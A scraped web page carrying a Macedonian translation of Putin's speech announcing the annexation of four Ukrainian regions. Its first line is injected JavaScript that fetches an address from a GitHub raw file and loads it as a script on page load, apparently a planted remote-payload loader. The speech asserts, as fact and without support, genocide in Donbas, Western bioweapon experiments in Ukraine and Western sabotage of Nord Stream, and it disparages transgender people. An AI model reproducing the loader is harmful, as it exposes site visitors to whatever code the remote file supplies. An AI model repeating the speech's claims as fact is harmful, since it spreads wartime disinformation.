;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Путин: Западот е подготвен да прегази сè за да го зачува неоколонијалниот систем - Антропол
АктуелноИнтернационално

Путин: Западот е подготвен да прегази сè за да го зачува неоколонијалниот систем

  • Говорот на Владимир Путин, на церемонијата по повод договорот за приклучување кон Руската Федерација на областите каде беше спроведен референдум

Знаете дека во Доњецката и Луганската народни републики, Запорожската и Херсонската области се одржаа референдуми. Нивните резултати се сумирани, тие се познати. Луѓето го направија својот избор, јасен избор.

Денеска потпишуваме договори за прием на Доњецката Народна Република, Луганската Народна Република, Запорожската и Херсонската области во состав на Русија. Сигурен сум дека Федералното Собрание ќе ги поддржи уставните закони за прием и за формирање во Русија на четири нови региони, четири нови субјекти на Руската Федерација, бидејќи тоа е волја на милиони луѓе.

И тоа, се разбира, е нивно неотуѓиво право, кое е втемелено во првиот член од Повелбата на ОН, кој директно зборува за принципот на еднакви права и самоопределување на народите.

Повторувам: ова е неотуѓиво право на луѓето, засновано на историско единство, во име на кое победуваа генерациите на нашите предци, оние кои од почетокот на Древната Русија со векови ја создаваа и ја бранеа земјата. Овде, во Новоросија, се бореле Румјанцев, Суворов и Ушаков, Катерина II и Потемкин ги основале нови градови. Овде нашите дедовци и прадедовци се бореа до смрт за време на Големата Татковинска војна.

<…>

Зад изборот на милиони жители во народните републики Доњецк и Луганск, областите Запорожје и Херсон, стојат нашата заедничка судбина и илјадагодишна историја. Луѓето ја пренеле оваа духовна врска на своите деца и внуци. И покрај сите искушенија, тие со години ја носеа љубовта кон Русија. И никој не може да го уништи ова чувство во нас. Затоа, и постарите генерации и младите, оние кои се родени по трагедијата од распадот на Советскиот Сојуз, гласаа за нашето единство, за нашата заедничка иднина.

<…>

… Советскиот Сојуз веќе го нема, минатото не може да се врати. И на Русија тоа денес повеќе не ѝ треба, ние не се стремиме кон тоа. Но, нема ништо посилно од одлучноста на милиони луѓе кои по својата култура, вера, традиции, јазик се сметаат себеси за дел од Русија, чии предци живееле во една држава со векови. Нема ништо посилно од одлучноста на овие луѓе да се вратат во својата вистинска, историска Татковина.

Долги осум години луѓето во Донбас беа подложени на геноцид, гранатирање и блокада, а во Херсон и Запорожје на криминален начин се обидуваа да ги натераат луѓето да негуваат омраза кон Русија, кон сè што е руско. Сега, уште во текот на референдумите, режимот во Киев се закануваше со насилство, смрт на наставниците, жените кои работеа во изборните комисии, заплашуваше со репресии милиони луѓе кои дојдоа да ја изразат својата волја. Но, непобедениот народ на Донбас, Запорожје и Херсон го кажа својот збор.

Сакам да ме слушнат властите во Киев и нивните вистински господари на Западот, сите да го запамтат ова: луѓето што живеат во Луганск и Доњецк, Херсон и Запорожје стануваат наши граѓани засекогаш.

Го повикуваме режимот во Киев веднаш да го прекине огнот, сите борбени активности, војната што ја започна во 2014 година и да се врати на преговарачката маса. Подготвени сме за ова, ова го изjаивме уште повеќе пати. Но, ние нема да разговараме за изборот на луѓето во Доњецк, Луганск, Запорожје и Херсон, тој е направен, Русија нема да го предаде. И денешните власти во Киев треба да ја третираат оваа слободна волја на народот со почит, и ништо друго. Ова е единствениот пат до мирот.

Ќе ја заштитиме нашата земја со сите сили и средства со кои располагаме и ќе направиме сè за да обезбедиме безбеден живот на нашиот народ. Ова е големата ослободителна мисија на нашиот народ.

<…>

Драги пријатели, колеги!

Денеска сакам … да кажам за што се бори нашиот народ, кој непријател ни се спротивставува, кој го фрла светот во нови војни и кризи, извлекувајќи го својот крвав профит од оваа трагедија.

Нашите сонародници, нашите браќа и сестри во Украина … со свои очи видоа што му подготвуваат владејачките кругови на таканаречениот Запад за целото човештво. Тука тие, всушност, само ги фрлија маските, ја покажаа својата вистинска содржина.

По распадот на Советскиот Сојуз, Западот одлучи дека светот, сите ние, засекогаш ќе мора да согласуваме со неговите диктати. Потоа, во 1991 година, Западот очекуваше дека Русија нема да закрепне од таквите шокови и сама ќе се распадне. … Но, Русија се спротивстави, оживи, зајакни, повторно го зазеде своето заслужено место во светот.

Во исто време, Западот цело ова време бараше и продолжува да бара нова шанса да нè удри, да ја ослабне и уништи Русија, за која секогаш сонува да ја подели, да ги спротивстави нивните народите, да ги осуди на сиромаштија и изумирање. Едноставно немаат мир поради тоа што во светот има толку голема, огромна земја со своја територија, природно богатство, ресурси, со народ кој не знае и никогаш нема да живее по туѓи наредби.

Западот е подготвен да прегази сè за да го зачува неоколонијалниот систем што му дозволува да паразитира, всушност, да го ограбува светот на сметка на моќта на доларот и технолошките диктати, да собира данок од човештвото, да го извлече главниот извор на незаработениот просперитет, рентата на хегемонот. Зачувувањето на оваа рента е нивниот клучен, вистински и апсолутно себичен мотив. Затоа во нивни интереси е тоталната десуверенизација. Оттука и нивната агресија кон независните држави, кон традиционалните вредности и оригиналните култури, обидите за поткопување на меѓународните и интегративните процеси надвор од нивна контрола, новите светски валути и центри на технолошки развој. За нив е критично сите земји да им го предадат својот суверенитет на САД.

Владејачките елити на некои држави доброволно се согласуваат да го направат тоа, доброволно се согласуваат да станат вазали; други се поткупени, заплашени. И ако не успее, тие уништуваат цели држави, оставајќи зад себе хуманитарни катастрофи, мачења, урнатини, милиони уништени, извалкани човечки судбини, терористички енклави, зони на социјални катастрофи, протекторати, колонии и полуколонии. Ним не им е гајле сè додека добиваат сопствен бенефит.

Сакам уште еднаш да нагласам: токму во алчноста, во намерата да ја зачува својата неограничена моќ, постојат вистинските причини за хибридната војна што „колективниот Запад“ ја води против Русија. Не нѝ посакуваат слобода, туку сакаат да нè гледаат како колонија. Не сакаат рамноправна соработка, туку грабеж. Сакаат да нè гледаат не како слободно општество, туку како толпа бездушни робови.

За нив директна закана е нашата мисла и филозофија и затоа ги вршат атентати на нашите филозофи. Нашата култура и уметност се опасност за нив, па се обидуваат да ги забранат. Закана за нив е и нашиот развој и просперитет – конкуренцијата расте. Воопшто не им треба Русија, но таа нам ни треба.

Би сакал да ве потсетам дека претензиите за светска доминација во минатото беа уништени повеќе од еднаш со храброста и издржливоста на нашиот народ. Русија секогаш ќе биде Русија. И овоj пат ќе успееме да ги одбраниме и нашите вредности и нашата Татковина.

Западот смета дека е неказнив, дека ќе се извлече од сè. Всушност, досега се извлече од сè. Спогодбите во областа на стратешката безбедност одат во корпа за отпадоци; договорите постигнати на највисоко политичко ниво се прогласени за лажни; цврсти ветувања дека НАТО нема да се прошири кон исток, штом нашите поранешни лидери ги «купија», се претворија во валкана измама; договорите за противракетна одбрана и ракетите со среден и помал дострел се еднострано прекршени под измислен изговор.

Сè што слушаме од сите страни е дека Западот се залага за ред заснован на правила. Од каде дојдоа тие? Кој воопшто ги видеа овие правила? Кој се согласи? Слушајте, ова е само некаква глупост, чиста измама, двојни или дури тројни стандарди! Ова е измислено само за будали!

Русија е голема милениумска сила, земја-цивилизација и нема да живее според такви наместени, лажни правила.

Таканаречениот Запад е оној што го погази принципот на неповредливост на границите, а сега по свој избор одлучува кој има право на самоопределување, а кој нема, кој не е достоен за тоа. Зошто така одлучуваат, кој им дал такво право, не е јасно. Самите за себеси.

Затоа изборот на луѓето на Крим, во Севастопољ, во Донецк, Луганск, Запорожје и Херсон предизвикува силен гнев кај нив. Овој Запад нема морално право да го оценува, дури и да спомне за слободата на демократијата. Нема, и никогаш немал!

Западните елити не само што го негираат националниот суверенитет и меѓународното право. Нивната хегемонија има има силно изразен карактер на тоталитаризам, деспотизам и апартхејд. Тие дрско го делат светот на свои вазали, на таканаречени цивилизирани земји и на сите останати, кои според планот на денешните западни расисти треба да се додадат на списокот на варвари и дивјаци. Лажните етикети – «одметната земја», «авторитарен режим» – се веќе готови, жигосуваат цели народи и држави и нема ништо ново во ова. Нема ништо ново во ова: западните елити се она што беа, и останаа такви – колонијалистички. Дискриминираат, ги делат народите на «прва» и «друга» класа.

Таков политички национализам и расизам никогаш не сме прифатиле и нема да прифатиме. А што е, ако не расизам, русофобијата, која сега се шири низ целиот свет? Што е, ако не расизам, цврстото убедување на Западот дека неговата цивилизација, неолибералната култура е неоспорен модел за целиот свет? «Оној што не е со нас е против нас». Дури и звучи чудно.

<…>

Ќе нагласам дека една од причините за вековната русофобија, нескриената злоба на овие западни елити кон Русија е токму тоа што не дозволивме да бидеме ограбени во периодот на колонијалните освојувања, ги принудивме Европејците да тргуваат за заедничка корист. Тоа беше постигнато со создавање силна централизирана држава во Русија, која се разви и се зацврсти на големите морални вредности на православието, исламот, јудаизмот и будизмот, на руската култура и на рускиот збор отворени за сите.

Познато е дека повеќе пати се правеле планови за интервенции во Русија, се правеле обиди да се искористи времето на неволјите на почетокот на 17 век и во периодот на пресврти по 1917 година – тие не успеале. Западот сепак успеа да ги искористи богатствата на Русија на крајот на 20 век, кога државата беше уништена. Тогаш бевме наречени и пријатели и партнери, но всушност тие нѐ третираа како колонија – билиони долари беа извлечени од земјата под различни шеми. Сите се сеќаваме на сѐ, ништо не сме заборавиле.

<…>

Западните земји со векови тврдат дека им носат слобода и демократија на другите народи. Сè е токму спротивно: наместо демократија – потиснување и експлоатација; наместо слобода – ропство и насилство. Целиот униполарен светски поредок е инхерентно антидемократски и не слободен, тој е целосно лажлив и лицемерен.

Соединетите Американски Држави се единствената земја во светот која двапати употреби нуклеарно оружје, уништувајќи ги јапонските градови Хирошима и Нагасаки. Патем, тие направија преседан.

Ќе потсетам и на тоа дека САД заедно со Британците ги претворија Дрезден, Хамбург, Келн и многу други германски градови во урнатини без никаква воена потреба за време на Втората светска војна. И тоа беше направено демонстративно, без никаква, повторувам, воена неопходност. Имаше само една цел: исто како и во случајот со нуклеарните бомбардирања во Јапонија, да се заплаши и нашата земја и целиот свет.

Соединетите Американски Држави оставија страшна трага во меморијата на народите на Кореја и Виетнам со варварско бомбардирање на големи простори, т.н. «тепих бомбардирање», употребата на напалм и хемиско оружје.

Тие до денешен ден всушност ги окупираа Германија, Јапонија, Република Кореја и други земји, и притоа цинично ги нарекуваат рамноправни сојузници. Видете, се прашувам каков сојуз е тоа? Целиот свет знае дека лидерите на овие земји се набљудувани, на првите луѓе на овие држави им се поставуваат апарати за прислушување не само во канцелариите, туку и во станбените простории. Тоа е вистински срам. Срамота е и за тие што го прават ова и за оние што како роб молкум и кротко ја голтаат оваа грубост.

Тие ги нарекуваат наредбите и грубите, навредливи извици на адреса на нивните вазали, – евроатлантска солидарност, развојот на биолошко оружје, експериментите врз живи луѓе, вклучително и во Украина, – благородни медицински истражувања.

<…>

Сега извезуваат леб од Украина. Каде оди тој под изговор дека «обезбедува храна за најсиромашните земји во светот»? Каде оди? Сè оди во истите европски земји. Само пет проценти се отидени во најсиромашните земји во светот. Повторно, уште една лага и директна измама.

<…>

Вашингтон бара сè повеќе санкции против Русија, а повеќето европски политичари кротко се согласуваат со ова. Тие добро разбираат дека САД, туркајќи го целосното откажување на ЕУ од руските енергетски носители и другите ресурси, практично води кон деиндустријализација на Европа, до целосно преземање на европскиот пазар – тие сето тоа го разбираат, тие европски елити, тие разбираат сè, но претпочитаат да им служат на интересите на другите. Ова веќе не е сервилност, туку директно предавство на нивните народи. Но Господ Бог нека е со нив, тоа е нивна работа.

Но за Англосаксонците сега санкциите не се доволни, тие се префрлија на саботажа – неверојатно, но факт – организирајќи експлозии на меѓународните гасоводи „Северен тек“ што минуваат по дното на Балтичкото Море, тие всушност почнаа да ја уништуваат сеевропската енергетска инфраструктура. На сите им е јасно кој има корист од ова. Кој има корист, тој го направи тоа, се разбира.

Американскиот диктат е изграден на брутална сила, на „правото на тупаници“. Некогаш убаво завиткано, некогаш без никаква обвивка, но суштината е иста – „правото на тупаници“. Оттука и распоредувањето и одржувањето на стотици воени бази во сите страни на светот, проширувањето на НАТО, обидите за формирање на нови воени сојузи како што се AUKUS и слично. Во тек е и активна работа за создавање на воено-политичка врска меѓу Вашингтон-Сеул-Токио. Сите оние држави кои поседуваат или настојуваат да поседуваат вистински стратешки суверенитет и се способни да ја оспорат западната хегемонија автоматски се вклучуваат во категоријата непријатели.

<…>

Веќе слушнавме за задржување на Русија, Кина, Иран. Верувам дека на ред се другите земји од Азија, Латинска Америка, Африка, Блискиот Исток, како и сегашните партнери и сојузници на САД. Знаеме дека ако не им се допаѓа, тие исто така воведуваат санкции против своите сојузници – прво против една банка, потоа против друга; сега против една компанија, сега против друга. Ова е истата практика и ќе се проширува.

Во исто време, Западот јасно и одамна го демонстрира посакуваното наместо реалното. Така, започнувајќи блицкриг со санкции против Русија, тие веруваа дека уште еднаш ќе можат да го изградат целиот свет по нивна команда. Но, како што се испостави, таквата розова перспектива не ги возбудува сите, освен можеби комплетните политички мазохисти и љубителите на други нетрадиционални форми на меѓународни односи. Повеќето држави одбиваат да поздрават и избираат разумен пат на соработка со Русија.

<…>

Таквата самоувереност е директен производ не само на озлогласениот концепт на сопствената ексклузивност – иако ова, се разбира, едноставно е изненадувачки – туку и на вистинскиот „информативен глад” на Запад. Ја удавија вистината во океан од митови, илузии и фалсификати, користејќи крајно агресивна пропаганда, непромислено лажејќи, како Гебелс. Колку е поневеројатна лагата, толку побрзо ќе поверуваат во неа – така постапуваат, според овој принцип.

Но, луѓето не можат да се хранат со испечатени долари и евра. Невозможно е да се нахрани со овие парчиња хартија, а невозможно е да се загрее дом со виртуелната, надуена капитализација на западните социјални мрежи. Сето ова е важно, за што зборувам, но не помалку важно е тоа што беше кажано: никого не можеш да нахраниш со хартијка – треба храна, а никого нема да загрееш ни со овие напумпани капитализации – потребни се енергетски носители. 

Затоа, политичарите во истата Европа треба да ги убедат своите сограѓани да јадат помалку, да се мијат поретко и да се облекуваат потопло дома. И оние кои почнуваат да поставуваат фер прашања „всушност, зошто е тоа така?” – веднаш се прогласени за непријатели, екстремисти и радикали. Префрлаат стрели на Русија, велат: еве, велат, кој е изворот на сите ваши неволји. Повторно лажат.

Што сакам да нагласам, потенцирам? Постојат сите причини да се верува дека западните елити нема да бараат конструктивни начини за излез од светската криза со храна и енергија, која настана по нивна вина, токму по нивна вина, како резултат на нивната долгогодишна политика многу пред нашата специјална воена операција во Украина, во Донбас. Немаат намера да ги решаваат проблемите на неправдата и нееднаквоста.  Постои страв дека тие се подготвени да користат други, познати за нив, рецепти.

И тука вреди да се потсетиме дека Западот излезе од противречностите на почетокот на 20 век преку Првата светска војна. Добивките од Втората светска војна им овозможија на САД конечно да ги надминат последиците од Големата депресија и да станат најголема економија во светот, да ја наметнат на планетата моќта на доларот како глобална резервна валута. И задоцнетата криза од 80-тите – и во 80-тите години на минатиот век кризата исто така се влоши – Западот во голема мера ја надмина со присвојување на наследството и ресурсите на Советскиот Сојуз што се распаѓаше и на крајот се распадне. Тоа е факт.

Сега, за да се извлечат од друга сплетка на противречности, треба да ја скршат Русија и другите држави кои по секоја цена го избираат суверениот пат на развој за да го ограбат туѓото богатство уште повеќе и на овој трошок да им ги затворат дупките. Доколку тоа не се случи, не исклучувам дека ќе се обидат целосно да го доведат системот до колапс, на кој може да се префрли вината или, не дај Боже, да се решат да ја користат познатата формула „ војната ќе отпише сè“.

Русија ја разбира својата одговорност пред светската заедница и ќе направи сè за да ги вразуми таквите вжештени глави.

<…>

Ајде да одговориме на некои многу едноставни прашања за себе. Сега сакам да се вратам на она што го кажав, сакам да им се обратам на сите граѓани … на сите граѓани на Русија: дали сакаме да имаме, тука, во нашата земја, во Русија, наместо мама и тато, „родител број еден“, „број два“, „број три“ – дали тие веќе се сосема луди? Дали навистина сакаме да им се наметнуваат перверзии кои водат кон деградација и изумирање на децата во нашите училишта уште од основните одделенија? Да се тапаат во нив дека наводно има и други полови освен жени и мажи и да им понудат операција за промена на полот? Дали го сакаме сето ова за нашата земја и нашите деца? За нас сето тоа е неприфатливо, имаме поинаква, своја иднина.

Повторувам, диктатурата на западните елити е насочена против сите општества, вклучувајќи ги и самите народи на западните земји. Ова е предизвик за сите. Таквото целосно негирање на човекот, уривањето на верата и традиционалните вредности, потиснувањето на слободата добива карактеристики на „обратна религија“ – отворен сатанизам. Во Проповедта на гората, Исус Христос, осудувајќи ги лажните пророци, вели: по нивните плодови ќе ги познаете. И овие отровни плодови се веќе очигледни за луѓето – не само кај нас, во сите земји, вклучително и за многу луѓе и на самиот Запад.

Светот влезе во период на револуционерни трансформации, тие се од фундаментална природа. Се формираат нови развојни центри, тие го претставуваат мнозинството – мнозинството! – на светската заедница и се подготвени не само да ги изјаснат своите интереси, туку и да ги заштитат, а мултиполарноста да ја гледаат како можност за зајакнување на нивниот суверенитет, а со тоа и за стекнување вистинска слобода, историска перспектива, нивното право на независни, креативни, оригинален развој, на хармоничен процес.

Во целиот свет, вклучително и во Европа и во САД, како што реков, имаме многу истомисленици и чувствуваме, ја гледаме нивната поддршка. Во различни земји и општества веќе се развива ослободително, антиколонијално движење против униполарната хегемонија. Неговото присутство само ќе расте. Токму оваа сила ќе ја одредува идната геополитичка реалност.

Драги пријатели!

Денеска се бориме за праведен и слободен пат, пред сè за нас самите, за Русија, за да засекогаш ги остане диктатот, деспотизмот во минатото. Убеден сум дека земјите и народите разбираат дека политиката заснована на ексклузивност на кој било, на потиснување на други култури и народи, е всушност криминална, дека мора да ја свртиме оваа срамна страница. Колапсот на западната хегемонија што започна е неповратен. И пак повторувам: нема да биде исто како порано.

<…>

Денеска се бориме никому да не му падне на памет дека Русија, нашиот народ, нашиот јазик, нашата култура може да се земе и да се избрише од историјата. Денес ни треба консолидација на целото општество, а таквата кохезија може да се заснова само на суверенитет, слобода, создавање и правда. Нашите вредности се човечност, милост и сочувство.

И сакам да го завршам мојот говор со зборовите на вистинскиот патриот Иван Александрович Иљин: „Ако ја сметам Русија за моја Татковина, тогаш тоа значи дека сакам на руски начин, размислувам и мислам, пеам и зборувам руски; дека верувам во духовната сила на рускиот народ. Неговиот дух е мојот дух; неговата судбина е моја судбина; неговото страдање е мојата тага; неговото цветање е мојата радост“.

Зад овие зборови стои голем духовен избор, кој повеќе од илјада години руска државност го следеа многу генерации наши предци. Денес го правиме овој избор, граѓаните на Доњецката и Луганската народни републики, жителите на Запорожската и Херсонската облати го направија овој избор. Тие го направија изборот да бидат со својот народ, да бидат со Татковината, да ја живеат нејзината судбина, да победуваат заедно со неа.

Зад нас е вистината, зад нас е Русија!